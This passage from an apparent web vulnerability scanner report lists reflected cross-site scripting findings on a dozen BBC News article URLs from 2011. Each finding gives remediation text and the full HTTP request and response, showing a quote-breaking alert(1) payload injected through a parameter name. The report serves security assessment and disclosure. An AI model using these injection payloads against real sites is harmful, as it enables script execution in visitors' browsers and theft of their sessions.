Set-Cookie: BBC-UID=545d2575aeaa552716cbef36c179dad3a189880ed060e1ba34eb6a558d80daba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476183000,
       editionToServe: 'us',
       queryString: '34c0d'-alert(1)-'1fc2efe71c4=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1241785
...[SNIP]...

1.25. http://www.bbc.co.uk/news/science-environment-12424620 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cae'-alert(1)-'e32dfe7f00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12424620?73cae'-alert(1)-'e32dfe7f00=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:04 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:03:04 GMT
Connection: close
Set-Cookie: BBC-UID=549d25459e0a25c8dabdaa3151b5a2cc9e853a274080f1099bab033f13f5a3320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:04 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549d25459e0a25c8dabdaa3151b5a2cc9e853a274080f1099bab033f13f5a3320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:04 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476184000,
       editionToServe: 'us',
       queryString: '73cae'-alert(1)-'e32dfe7f00=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1242462
...[SNIP]...

1.26. http://www.bbc.co.uk/news/technology-12419672 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20fd3'-alert(1)-'d9bcef9e45f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12419672?20fd3'-alert(1)-'d9bcef9e45f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
Set-Cookie: BBC-UID=74fd25955e0ac5e94ab8f7a741c9a613e1440fada0b0811a948bcaa532d145f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74fd25955e0ac5e94ab8f7a741c9a613e1440fada0b0811a948bcaa532d145f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: '20fd3'-alert(1)-'d9bcef9e45f=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12419672',
       assetType: 'story',
...[SNIP]...

1.27. http://www.bbc.co.uk/news/technology-12429808 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0afa'-alert(1)-'d75300cd789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12429808?b0afa'-alert(1)-'d75300cd789=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=780
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
Set-Cookie: BBC-UID=d4bda5b5ce5a85b9ea2f4715e128467346f9d7bca090d19ae4cb8a94462c70740Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d4bda5b5ce5a85b9ea2f4715e128467346f9d7bca090d19ae4cb8a94462c70740Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: 'b0afa'-alert(1)-'d75300cd789=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429808',
       assetType: 'story',
...[SNIP]...

1.28. http://www.bbc.co.uk/news/uk-12427839 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37866'-alert(1)-'dde9ca8fcd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12427839?37866'-alert(1)-'dde9ca8fcd7=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=243de5d5cecaa5da9ae34505c13749dcdb196e609040c1ba94ebdaf6271467180Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=243de5d5cecaa5da9ae34505c13749dcdb196e609040c1ba94ebdaf6271467180Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: '37866'-alert(1)-'dde9ca8fcd7=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427839',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

1.29. http://www.bbc.co.uk/news/uk-12437244 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19795'-alert(1)-'154c8c787b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12437244?19795'-alert(1)-'154c8c787b8=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=757
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=240dd5455eea95fc5a5dd74f81e9f1b97318f2e70030f1699b4bc33e60fe34cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=240dd5455eea95fc5a5dd74f81e9f1b97318f2e70030f1699b4bc33e60fe34cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: '19795'-alert(1)-'154c8c787b8=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437244',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

1.30. http://www.bbc.co.uk/news/uk-england-london-12438040 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d141'-alert(1)-'2895036776c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-12438040?3d141'-alert(1)-'2895036776c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=c48d65e5ce7a25bcfb587e66517d4352f2bd07b4104042e347bd83b47c08d3600Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c48d65e5ce7a25bcfb587e66517d4352f2bd07b4104042e347bd83b47c08d3600Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: '3d141'-alert(1)-'2895036776c=1',
       referrer: null,
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12438040',
       assetType: 'story',
...[SNIP]...

1.31. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a95'-alert(1)-'c787b57eb90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12427112?87a95'-alert(1)-'c787b57eb90=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=720
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=443db5e5be0a653deaadecf151f92644528f02768080e1997bbb73ff53d5a3720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=443db5e5be0a653deaadecf151f92644528f02768080e1997bbb73ff53d5a3720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: '87a95'-alert(1)-'c787b57eb90=1',
       referrer: null,
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427112',
       assetTy
...[SNIP]...

1.32. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec18'-alert(1)-'d5960dff01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12428837?8ec18'-alert(1)-'d5960dff01f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:10 GMT
Keep-Alive: timeout=10, max=690
Expires: Sat, 12 Feb 2011 02:03:10 GMT
Connection: close
Set-Cookie: BBC-UID=249d45759efa452e5b7aa627f1d599e0f85a64256050a1ca247b5a64228c64400Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=249d45759efa452e5b7aa627f1d599e0f85a64256050a1ca247b5a64228c64400Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476190000,
       editionToServe: 'us',
       queryString: '8ec18'-alert(1)-'d5960dff01f=1',
       referrer: null,
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428837',
       assetTy
...[SNIP]...

1.33. http://www.bbc.co.uk/news/uk-politics-12428814 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71dcc'-alert(1)-'b39bd07503d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-politics-12428814?71dcc'-alert(1)-'b39bd07503d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=791
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=a49d1505dedaf53f4b797d782145e408efb5812400c0b1aac45bba6421cc528c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d1505dedaf53f4b797d782145e408efb5812400c0b1aac45bba6421cc528c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: '71dcc'-alert(1)-'b39bd07503d=1',
       referrer: null,
       section: 'politics',
       sectionPath: '/Politics',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428814',
       assetType: 'story',
       
...[SNIP]...

1.34. http://www.bbc.co.uk/news/uk-scotland-12433015 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a68fe'-alert(1)-'701cf850c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12433015?a68fe'-alert(1)-'701cf850c69=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=767
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=e4fd75d50e5aa5ffbb28a2a3516d0843ff98ec952040124387bd9a5078113b3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4fd75d50e5aa5ffbb28a2a3516d0843ff98ec952040124387bd9a5078113b3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: 'a68fe'-alert(1)-'701cf850c69=1',
       referrer: null,
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433015',
       assetType: 'story',
       
...[SNIP]...

1.35. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82edd'-alert(1)-'453a1a57e2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-tayside-central-12433192?82edd'-alert(1)-'453a1a57e2e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=770
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=945d0525de2a76302a51e915e109e024eab6d840f0402119db3b9322776da9ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=945d0525de2a76302a51e915e109e024eab6d840f0402119db3b9322776da9ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476192000,
       editionToServe: 'us',
       queryString: '82edd'-alert(1)-'453a1a57e2e=1',
       referrer: null,
       section: 'tayside-and-central',
       sectionPath: '/Scotland/Tayside and Central',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '124331
...[SNIP]...

1.36. http://www.bbc.co.uk/news/uk-wales-12427865 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b285d'-alert(1)-'59be79fc31d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12427865?b285d'-alert(1)-'59be79fc31d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=751
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a44dc5650e7ac6a2f63398247183e4a1c40848b460602233076dc3c50641b5360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a44dc5650e7ac6a2f63398247183e4a1c40848b460602233076dc3c50641b5360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476194000,
       editionToServe: 'us',
       queryString: 'b285d'-alert(1)-'59be79fc31d=1',
       referrer: null,
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427865',
       assetType: 'story',
